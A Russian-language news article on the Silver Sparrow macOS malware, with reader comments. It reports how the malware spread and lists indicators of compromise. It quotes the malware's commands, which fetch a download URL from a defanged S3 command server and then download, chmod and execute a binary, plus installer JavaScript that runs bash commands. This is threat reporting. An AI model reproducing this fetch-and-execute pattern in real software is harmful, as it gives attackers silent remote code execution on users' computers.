На 30 тысячах компьютеров с macOS нашли странный зловред, который ждёт команду



    Новая вредоносная программа Silver Sparrow («Серебряный воробей»), обнаруженная почти на 30 000 компьютерах Mac по всему миру, привлекла внимание специалистов по безопасности. Причин несколько. Во-первых, зловред поставляется в двух бинарниках, в том числе для процессора М1. Во-вторых, исследователи не могут понять цель злоумышленников.

    Раз в час заражённые компьютеры проверяют контрольный сервер на предмет новых команд или двоичных файлов для выполнения:

    curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.json
    plutil -convert xml1 -r /tmp/version.json -o /tmp/version.plist
    <anchor>habracut</anchor>
    ...
    
    curl $(/usr/libexec/PlistBuddy -c "Print :downloadUrl" /tmp/version.plist) --output /tmp/verx
    chmod 777 /tmp/verx
    /tmp/verx upbuchupsf

    Но до сих пор никакой полезной нагрузки не доставлено ни на одну из 30 000 заражённых машин. Отсутствие полезной нагрузки предполагает, что вредоносное ПО может начать действовать, как только будет выполнено неизвестное условие.

    Любопытно, что вредоносное ПО поставляется с механизмом полного удаления, который обычно используется в профессиональных разведывательных операциях. Однако до сих пор нет никаких признаков использования функции самоуничтожения, что ставит вопрос о том, зачем этот механизм.

    Помимо этих вопросов, вредоносная программа примечательна наличием бинарника для чипа M1, представленного в ноябре 2020 года. Это всего лишь вторая известная вредоносная программа macOS для M1. Двоичный файл ещё более загадочен, потому что для выполнения команд использует JavaScript API установщика macOS. Это затрудняет анализ содержимого установочного пакета или того, как этот пакет использует команды JavaScript. После установки зловред запускается командой system.run.

    function bash(command) {
             system.run('/bin/bash', '-c', command)
        }
    
        function appendLine(line, file)
        {
            bash(`printf "%b\n" '${line}' >> ${file}`)
        }
    
        function appendLinex(line, file)
        {
            bash(`"echo" ${line} >> ${file}`)
        }
        function appendLiney(line, file)
        {
            bash(`printf "%b" '${line}' >> ${file}`)
        }


    Silver Sparrow поставляется в двух версиях — одна с двоичным кодом в формате mach-object, скомпилированным для процессоров Intel x86_64, а другая с двоичным кодом Mach-O для M1

    Malware version 1
    File name: updater.pkg (installer package for v1)
    MD5: 30c9bc7d40454e501c358f77449071aa

    Malware version 2
    File name: update.pkg (installer package for v2)
    MD5: fdd6fb2b1dfe07b0e57d4cbfef9c8149

    Командный сервер
    hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json

    После исполнения Silver Sparrow оставляет два скрипта на заражённом диске: /tmp/agent.sh и ~/Library/Application Support/verx_updater/verx.sh.

    Вредоносная программа обнаружена в 153 странах, преимущественно в США, Великобритании, Канаде, Франции и Германии. Использование Amazon Web Services и сети доставки контента Akamai обеспечивает надёжную работу командной инфраструктуры, а также затрудняет блокировку серверов. Зловред открыли исследователи из компании Red Canary.

    Хотя для Silver Sparrow ещё не вышло никакой полезной нагрузки, его считают достаточно серьёзной угрозой. Программа уже сильно распространилась, она совместима с процессорами М1 и выполнена на очень высоком техническом уровне: «Silver Sparrow представляет собой достаточно серьёзную угрозу, для доставки потенциально эффективной полезной нагрузки в любой момент», — пишут исследователи Red Canary в своём блоге. — Учитывая эти причины для беспокойства, в духе прозрачности мы хотели как можно скорее поделиться всей информацией с индустрией информационной безопасности».

    До сих пор исследователи не встречали зловреды подобного типа. Этот экземпляр они назвали 'bystander binary', то есть «бинарник-наблюдатель». Любопытно, что при выполнении двоичный файл x86_64 отображает слова “Hello World!”, а бинарник M1 выдаёт “You did it!”. Исследователи подозревают, что файлы являются некими заполнителями, передают что-то установщику. Компания Apple отозвала сертификат разработчика для обоих бинарников.

    Silver Sparrow — всего лишь вторая вредоносная программа, написанная нативно для нового чипа Apple M1. Первым стал рекламный зловред GoSearch22 на прошлой неделе.

    Нативный код M1 работает на новой платформе быстрее и надёжнее, чем код x86_64, потому что не нуждается в трансляции. Многие разработчики обычных приложений macOS до сих пор не завершили процесс перекомпиляции для M1.

    После установки Silver Sparrow ищет, с какого URL был загружен установочный пакет, чтобы операторы ботнета знали, какой канал распространения наиболее эффективен. Пока остаётся неясным, как именно и где распространяется вредоносное ПО и как оно устанавливается. Однако проверка «успешных URL» предполагает, что одним каналом распространения может быть поисковая выдача, то есть установщики, скорее всего, выдают себя за законные приложения.

    Одна из самых впечатляющих вещей в Silver Sparrow — количество заражённых ею компьютеров Mac. Коллеги из Malwarebytes обнаружили, что Silver Sparrow установлен на 29 139 конечных точках macOS по состоянию на 17 февраля 2021 года. Это значительное достижение.

    И это только компьютеры, доступные для антивируса MalwareBytes, так что реальное число намного выше. «Это ещё раз показывает, что вредоносное ПО для macOS становится всё более распространённым и обычным явлением, несмотря на все усилия Apple», — говорит Патрик Уордл (Patrick Wardle), эксперт по безопасности macOS.
    Дата-центр «Миран»
    Решения для аренды и размещения ИТ-инфраструктуры

    Похожие публикации

    Комментарии 30

      +13

      Под MacOS же вирусов нет...

        +2
        Под любую ОСь есть зловреды. Вопрос лишь в том сколько сил и средств, необходимо чтоб заразить целевую ОС и что получить в результате.
          0
          Под TempleOS нет ни одного!
          0
          Вопрос ещё в распространённости целевой ОС, всё ещё фактически дефолтной ОС для персоналок является Windows.
        +7
        Использование Amazon Web Services и сети доставки контента Akamai обеспечивает надёжную работу командной инфраструктуры, а также затрудняет блокировку серверов.

        Мне кажется, так заблокировать сервер даже проще, надо лишь попросить Амазон заблокировать этот бакет и аккаунт, которому он пренадлежит. Или я чего-то не понимаю?

          0
          Уже заблокировали.
          Возможно, Амазон некоторое время тупил.
          Ну или пытались дождаться, пока кто-то подключится и закачает полезную нагрузку — с целью выследить.
            –2

            На основании чего? Есть нечто что по некоторым признакам похоже на малварь — но ничего плохого не сделало, и вообще не факт что сделает или даже собирается — это всё предположения.


            Может там вообще ничего малварного не планируется, вне зависимости от того на что это похоже — например всякие античиты и защиты в популярных играх (и приложениях) иногда намного больше похожи на малварь.


            Полезная нагрузка вообще может оказаться анонсом како-либо нового продукта, игры или чего-то в таком духе, чтобы выпрыгнуть как чёртик из табакерки в нужный момент одновременно на куче устройств.


            Любопытно, что вредоносное ПО поставляется с механизмом полного удаления, который обычно используется в профессиональных разведывательных операциях.

            А ещё как минимум адобовские инсталлеры флеша таким механизмом снабжались и удаляли себя после установки.

              +1
              Да это просто пасхалка!
            +13
            вредоносная программа Silver Sparrow
            исследователи из компании Red Canary

            совпадение? :)
              +4

              Почти — исследователи сами дали это название.

              0
              В блоке Red Canary есть детальная инструкция о признаках заражения системы данной программой, но вот к сожалению способов лечения ни здесь, ни там не описано. По всей видимости ждать обновлений АВ программ?
                +4

                А механика заражения какая?

                  +13
                  1. Вы покупаете компьютер с MacOS.
                    ...
                  2. Заражение
                    0
                    На Windows-ноутбуках вообще один шаг:
                    1. Вы покупаете ноутбук с дырявым (читай заражённым) ПО от производителя…
                      0
                      Обязательно должен быть шаг «Profit».
                    +3

                    Механика заражения скорее всего такая-же как и у всех остальных вирусов под macOS :1) скачай вирус 2) распакуй 3)установи сам и запусти

                      +1

                      Ну, то есть так себе новость.

                        0
                        Ну как сказать…
                        Скачанная и запущенная бухгалтершей программа вполне способна самостоятельно заразить сеть.
                    +1

                    Так а после отзыва лицензии разработчиков бинарников этот зловред вообще будет работать? Его бинарники же не запустятся?

                      +2
                      Я так понимаю, зависит от настроек ОС, по умолчанию не запустится
                        0

                        Даже если стоит режим "доверять всем", макось всё равно требует идти при первом открытии в настройки безопасности и вручную подтверждать приложение, вводя пароль администратора. Так что само не запустится. Плюс, это я описал ситуацию для приложения без подписи. Я не знаю, получится ли вообще запустить приложение, лицензию разработчика которого явно отозвали.

                      0
                      Silver Sparrow had infected 29,139 macOS endpoints across 153 countries as of February 17
                      Вообще интересно, что довольно большое число стран, такое впечатление, что это какая-то многовекторная атака.
                        +1
                        Возможно ответ здесь: «может быть поисковая выдача, то есть установщики, скорее всего, выдают себя за законные приложения» не поломанные ли программы установлены у клиентов? Многие чтоб не платить за лицензионное ПО, качают его с торрентов, при этом давая установщику право выполняться в обход предепреждения ОС.
                        0

                        Технически сложная программа, но ничего не делает, по крайней мере пока. Зачем, вот вопрос. Может обкатывают новую технологию?

                          0

                          ”Зловред открыли исследователи из компании Red Canary."
                          Серебряного воробья открыла красная канарейка… Мой фиолетовый павлин плачет от смеха

                            0
                            Будет, скажем, крайне неожиданно, если полезная нагрузка, внезапно, появится при попытке подключения с IP-адресов, например, Ирана…
                              0
                              обнаруженная почти на 30 000 компьютерах Mac по всему миру
                              Раз в час заражённые компьютеры проверяют контрольный сервер
                              Но до сих пор никакой полезной нагрузки не доставлено ни на одну из 30 000 заражённых машин.

                              Я че-то аж поднапрягся… Откуда «исследователи» знают о количестве зараженных клиентов? Откуда они знают доставлено ли что-то на клиенты или нет? Получается «исследователи» имеют доступ к серверу? И к клиенту? Может это их сервер? И их малваря?

                              Но, похоже, все довольно просто:
                              Malwarebytes researchers collaborated with Red Canary researchers on their find, and have collected significant data about the infection at this point. At the time of this writing, we’ve seen 39,080 unique machines with components of Silver Sparrow detected by Malwarebytes.
                              blog.malwarebytes.com/mac/2021/02/the-mystery-of-the-silver-sparrow-mac-malware

                              Получается malwarebytes, видимо, просто «покопались» в тех маках, на которых стоят их защитные продукты.

                              Короче, хочешь без смс и регистрации покопаться в чужом компьютере имей в друзьях компанию предлагающую антивирусное ПО.
                                0

                                Не столько "покопались", сколько добавили сигнатуру конкретного модуля в антивирь и настроили отправку событий нахождения этого конкретного модуля в сборщик антивирусной телеметрии. Такие сейчас почти у каждого вендора антивирусов есть. А дальше просто select unique id из собранной базы.

                                0
                                Ну я могу предположить, что хозяин ботнета прячется, чтобы использовать 0 day уязвимость, а пока просто набирает базу.

                                Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                Самое читаемое